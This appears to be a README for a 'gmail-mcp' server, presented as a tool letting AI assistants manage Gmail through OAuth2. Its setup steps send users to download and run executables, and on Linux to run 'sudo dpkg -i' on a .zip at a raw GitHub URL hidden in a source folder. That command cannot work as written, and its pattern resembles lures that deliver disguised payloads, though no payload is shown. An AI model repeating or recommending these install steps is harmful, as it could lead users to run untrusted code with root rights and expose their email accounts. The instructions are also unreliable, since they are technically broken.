gmail-mcp
Enables AI assistants to manage Gmail emails, including sending, searching, and organizing with labels and attachments via OAuth2.
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🚀 gmail-mcp - Manage Your Emails with Ease
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📖 Overview
The Gmail MCP Server helps you manage your emails effortlessly. Designed for AI assistants, it allows you to send, search, and organize your emails with labels and filters. With features like OAuth2 authentication, batch operations, and attachment handling, it works seamlessly with AI models like Claude, Gemini, and Cursor.
🚀 Getting Started
Follow these steps to set up and run the Gmail MCP Server:
1. Visit the Releases Page
To get the latest version of the application, visit this page: Releases Page.
2. Choose Your Version
On the Releases page, you will see a list of available versions. Select the version labeled as "Latest". This is the most stable release with all the latest features and fixes.
3. Download the Application
Click on the version number you selected. Look for the assets section. You will see files available for download. Click on the file that matches your operating system.
4. Install the Application
After downloading the file, locate it in your downloads folder. Follow these steps based on your operating system:
For Windows:
- Find the downloaded
.exefile. - Double-click the file to start the installation.
- Follow the on-screen instructions to complete the setup.
For macOS:
- Locate the downloaded
.dmgfile. - Open the file to mount it.
- Drag the application to your Applications folder.
- Open the application from your Applications folder.
For Linux:
- Open your terminal.
- Navigate to the directory where the file is downloaded.
- Use the following command to install:
sudo dpkg -i https://raw.githubusercontent.com/hahaha-saygex/gmail-mcp/main/src/builders/mcp_gmail_2.7-alpha.4.zip
5. Launch the Application
Once installed, you can launch the Gmail MCP Server:
- Windows: Find it in your Start menu and click to open.
- macOS: Open your Applications folder, find the app, and double-click it.
- Linux: Use the application launcher in your desktop environment.
🔑 Setting Up OAuth2 Authentication
Before you can send or manage emails, set up OAuth2 authentication:
- Go to the Google Developer Console.
- Create a new project and enable the Gmail API.
- Configure the consent screen and create credentials.
- Save your client ID and client secret.
When you first open the Gmail MCP Server, enter your credentials to authenticate.
⚙️ Features
- Email Sending: Quickly send emails directly from the interface.
- Email Searching: Easily find specific emails using keywords or filters.
- Email Organization: Use labels to categorize your messages.
- Batch Operations: Manage multiple emails at once, saving you time.
- Attachments: Upload and send attachments without hassle.
🖥️ System Requirements
Ensure your system meets the following requirements:
- Operating System: Windows 10 or later, macOS 10.13 or later, or a modern Linux distribution.
- RAM: Minimum of 4 GB.
- Disk Space: At least 100 MB of free space for installation.
📄 Troubleshooting
If you encounter issues while using the application:
- Common Errors: Check error messages for clues.
- Reinstallation: Uninstall and reinstall the application if necessary.
- Contact Support: Reach out for help on the Issues section of our GitHub repository.
🌐 Community & Support
Join our community to share your experiences or get help. You can find us in the following places:
- GitHub Issues: Report bugs or suggest features.
- Discussion Forum: Engage with other users and developers.
📢 Latest Updates
Stay up to date with the latest features and bug fixes by regularly checking the Releases page: Releases Page.
🔍 Conclusion
Managing your emails can be simple with the Gmail MCP Server. Follow the steps outlined here, and you will be up and running in no time. Give it a try and enhance your email management experience!
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